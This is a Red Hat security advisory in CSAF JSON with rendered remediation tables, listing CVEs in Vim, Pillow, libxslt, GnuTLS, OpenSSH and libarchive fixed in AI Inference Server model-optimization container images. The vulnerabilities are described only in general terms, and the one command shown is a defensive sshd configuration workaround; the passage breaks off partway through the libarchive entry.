| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Vim, an open-source command-line text editor. Specifically, an operating system (OS) command injection vulnerability exists in the `netrw` standard plugin. A remote attacker could exploit this by tricking a user into opening a specially crafted URL, such as one using the `scp://` protocol handler. Successful exploitation allows the attacker to execute arbitrary shell commands with the same privileges as the Vim process, leading to potential system compromise.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Vim. This vulnerability, a heap-buffer-overflow and a segmentation fault, exists in the swap file recovery logic. A local attacker could exploit this by providing a specially crafted swap file. This could lead to a denial of service (DoS) or potentially information disclosure.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Vim. By including a newline character in a pattern passed to Vim's glob() function, an attacker may be able to execute arbitrary shell commands. This command injection vulnerability allows for arbitrary code execution, depending on the user's shell settings.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64 | — |
Vendor Fix
fix
|
A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to trigger a denial of service (DoS) by providing a specially crafted FITS image file. The library's failure to limit the amount of GZIP-compressed data during decoding can lead to unbounded memory consumption, causing the system to crash or experience severe performance issues.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Pillow, a Python imaging library. A malicious actor could exploit this vulnerability by providing specially crafted nested lists as coordinates to image processing APIs within Pillow. This could lead to a heap buffer overflow, potentially causing a denial of service in applications using the library.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64 | — |
Vendor Fix
fix
|
A flaw was found in Pillow, a Python imaging library. A remote attacker could supply a specially crafted malicious PDF file, causing the application to hang indefinitely and consume 100% CPU. This vulnerability leads to a Denial of Service (DoS), making the application unresponsive.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64 | — |
Vendor Fix
fix
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat AI Inference Server Model Optimization Tools 3.3.3 (CUDA) is now available.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat\u00ae AI Inference Server Model Optimization Tools",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:16008",
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
},
{
"category": "external",
"summary": "https://www.redhat.com/en/products/ai/inference-server",
"url": "https://www.redhat.com/en/products/ai/inference-server"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2023-40403",
"url": "https://access.redhat.com/security/cve/CVE-2023-40403"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-14831",
"url": "https://access.redhat.com/security/cve/CVE-2025-14831"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-23868",
"url": "https://access.redhat.com/security/cve/CVE-2026-23868"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25749",
"url": "https://access.redhat.com/security/cve/CVE-2026-25749"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27135",
"url": "https://access.redhat.com/security/cve/CVE-2026-27135"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27622",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-28417",
"url": "https://access.redhat.com/security/cve/CVE-2026-28417"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-28421",
"url": "https://access.redhat.com/security/cve/CVE-2026-28421"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-33412",
"url": "https://access.redhat.com/security/cve/CVE-2026-33412"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-3497",
"url": "https://access.redhat.com/security/cve/CVE-2026-3497"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-40192",
"url": "https://access.redhat.com/security/cve/CVE-2026-40192"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-4111",
"url": "https://access.redhat.com/security/cve/CVE-2026-4111"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42308",
"url": "https://access.redhat.com/security/cve/CVE-2026-42308"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42309",
"url": "https://access.redhat.com/security/cve/CVE-2026-42309"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42310",
"url": "https://access.redhat.com/security/cve/CVE-2026-42310"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-42311",
"url": "https://access.redhat.com/security/cve/CVE-2026-42311"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-4424",
"url": "https://access.redhat.com/security/cve/CVE-2026-4424"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-4519",
"url": "https://access.redhat.com/security/cve/CVE-2026-4519"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-5121",
"url": "https://access.redhat.com/security/cve/CVE-2026-5121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-5201",
"url": "https://access.redhat.com/security/cve/CVE-2026-5201"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_16008.json"
}
],
"title": "Red Hat Security Advisory: Red Hat AI Inference Server Model Optimization Tools 3.3.3 (CUDA)",
"tracking": {
"current_release_date": "2026-05-14T22:36:17+00:00",
"generator": {
"date": "2026-05-14T22:36:17+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:16008",
"initial_release_date": "2026-05-11T14:12:10+00:00",
"revision_history": [
{
"date": "2026-05-11T14:12:10+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-05-12T17:26:30+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-14T22:36:17+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat AI Inference Server 3.3",
"product": {
"name": "Red Hat AI Inference Server 3.3",
"product_id": "Red Hat AI Inference Server 3.3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ai_inference_server:3.3::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat AI Inference Server"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64",
"product": {
"name": "registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64",
"product_id": "registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/model-opt-cuda-rhel9@sha256%3Ab4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd?arch=amd64\u0026repository_url=registry.redhat.io/rhaiis\u0026tag=1778244559"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"product": {
"name": "registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"product_id": "registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/model-opt-cuda-rhel9@sha256%3A3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0?arch=arm64\u0026repository_url=registry.redhat.io/rhaiis\u0026tag=1778244559"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64 as a component of Red Hat AI Inference Server 3.3",
"product_id": "Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64"
},
"product_reference": "registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"relates_to_product_reference": "Red Hat AI Inference Server 3.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64 as a component of Red Hat AI Inference Server 3.3",
"product_id": "Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
},
"product_reference": "registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64",
"relates_to_product_reference": "Red Hat AI Inference Server 3.3"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-40403",
"cwe": {
"id": "CWE-200",
"name": "Exposure of Sensitive Information to an Unauthorized Actor"
},
"discovery_date": "2025-03-04T12:01:50.826520+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2349766"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libxslt package. Processing web content may disclose sensitive information. This issue was addressed with improved memory handling.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libxslt: Processing web content may disclose sensitive information",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This CVE is a duplicate of CVE-2022-4909.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-40403"
},
{
"category": "external",
"summary": "RHBZ#2349766",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2349766"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-40403",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40403"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-40403",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40403"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/10",
"url": "http://seclists.org/fulldisclosure/2023/Oct/10"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/3",
"url": "http://seclists.org/fulldisclosure/2023/Oct/3"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/4",
"url": "http://seclists.org/fulldisclosure/2023/Oct/4"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/5",
"url": "http://seclists.org/fulldisclosure/2023/Oct/5"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/6",
"url": "http://seclists.org/fulldisclosure/2023/Oct/6"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/8",
"url": "http://seclists.org/fulldisclosure/2023/Oct/8"
},
{
"category": "external",
"summary": "http://seclists.org/fulldisclosure/2023/Oct/9",
"url": "http://seclists.org/fulldisclosure/2023/Oct/9"
},
{
"category": "external",
"summary": "https://bugs.chromium.org/p/chromium/issues/detail?id=1356211",
"url": "https://bugs.chromium.org/p/chromium/issues/detail?id=1356211"
},
{
"category": "external",
"summary": "https://bugzilla.gnome.org/show_bug.cgi?id=751621",
"url": "https://bugzilla.gnome.org/show_bug.cgi?id=751621"
},
{
"category": "external",
"summary": "https://gitlab.gnome.org/GNOME/libxslt/-/issues/94",
"url": "https://gitlab.gnome.org/GNOME/libxslt/-/issues/94"
},
{
"category": "external",
"summary": "https://support.apple.com/en-us/HT213927",
"url": "https://support.apple.com/en-us/HT213927"
}
],
"release_date": "2023-09-26T20:14:54.697000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:12:10+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16008",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "libxslt: Processing web content may disclose sensitive information"
},
{
"cve": "CVE-2025-14831",
"cwe": {
"id": "CWE-407",
"name": "Inefficient Algorithmic Complexity"
},
"discovery_date": "2025-12-17T14:48:30.222000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2423177"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in GnuTLS. This vulnerability allows a denial of service (DoS) by excessive CPU (Central Processing Unit) and memory consumption via specially crafted malicious certificates containing a large number of name constraints and subject alternative names (SANs).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "gnutls: GnuTLS: Denial of Service via excessive resource consumption during certificate verification",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated Moderate for Red Hat. GnuTLS is susceptible to a denial of service attack due to excessive CPU and memory consumption. This occurs when processing specially crafted malicious certificates containing a large number of name constraints and subject alternative names (SANs) during certificate verification.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-14831"
},
{
"category": "external",
"summary": "RHBZ#2423177",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2423177"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-14831",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14831"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-14831",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14831"
},
{
"category": "external",
"summary": "https://gitlab.com/gnutls/gnutls/-/issues/1773",
"url": "https://gitlab.com/gnutls/gnutls/-/issues/1773"
}
],
"release_date": "2026-02-09T14:26:34.939000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:12:10+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16008",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "gnutls: GnuTLS: Denial of Service via excessive resource consumption during certificate verification"
},
{
"cve": "CVE-2026-3497",
"cwe": {
"id": "CWE-824",
"name": "Access of Uninitialized Pointer"
},
"discovery_date": "2026-03-12T19:01:37.007806+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2447085"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the OpenSSH GSSAPI (Generic Security Service Application Program Interface) delta patches, as included in various Linux distributions. A remote attacker could exploit this by sending an unexpected GSSAPI message type during the key exchange process. This occurs because the `sshpkt_disconnect()` function, when called on an error, does not properly terminate the process, leading to the continued execution of the program with uninitialized connection variables. Accessing these uninitialized variables can lead to undefined behavior, potentially resulting in information disclosure or a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openssh: OpenSSH GSSAPI: Information disclosure or denial of service due to uninitialized variables",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "IMPORTANT: This vulnerability affects the OpenSSH GSSAPI delta as implemented in Red Hat Enterprise Linux and OpenShift Container Platform. An unauthenticated attacker could send a specially crafted GSSAPI message during key exchange, leading to the use of uninitialized variables and potentially undefined behavior. The severity of the impact is dependent on compiler hardening configurations.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-3497"
},
{
"category": "external",
"summary": "RHBZ#2447085",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447085"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-3497",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3497"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-3497",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3497"
},
{
"category": "external",
"summary": "https://ubuntu.com/security/CVE-2026-3497",
"url": "https://ubuntu.com/security/CVE-2026-3497"
},
{
"category": "external",
"summary": "https://www.openwall.com/lists/oss-security/2026/03/12/3",
"url": "https://www.openwall.com/lists/oss-security/2026/03/12/3"
}
],
"release_date": "2026-03-12T18:27:44.917000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-11T14:12:10+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16008",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16008"
},
{
"category": "workaround",
"details": "To mitigate this issue, disable GSSAPI key exchange in the OpenSSH server configuration. This prevents the server from processing GSSAPI messages, eliminating the vulnerability\u0027s attack surface.\n\nEdit `/etc/ssh/sshd_config` and add or modify the line:\n```\nGSSAPIKeyExchange no\n```\n\nAfter saving the changes, restart the `sshd` service for the mitigation to take effect. This action will prevent users from authenticating via GSSAPI.\n\n```\n# systemctl restart sshd\n```",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openssh: OpenSSH GSSAPI: Information disclosure or denial of service due to uninitialized variables"
},
{
"acknowledgments": [
{
"names": [
"Elhanan Haenel"
]
}
],
"cve": "CVE-2026-4111",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2026-03-11T11:18:51.609000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2446453"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was identified in the RAR5 archive decompression logic of the libarchive library, specifically within the archive_read_data() processing path. When a specially crafted RAR5 archive is processed, the decompression routine may enter a state where internal logic prevents forward progress. This condition results in an infinite loop that continuously consumes CPU resources. Because the archive passes checksum validation and appears structurally valid, affected applications cannot detect the issue before processing. This can allow attackers to cause persistent denial-of-service conditions in services that automatically process archives.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libarchive: Infinite Loop Denial of Service in RAR5 Decompression via archive_read_data() in libarchive",
"title": "Vulnerability summary"
},
{
"category": "other",
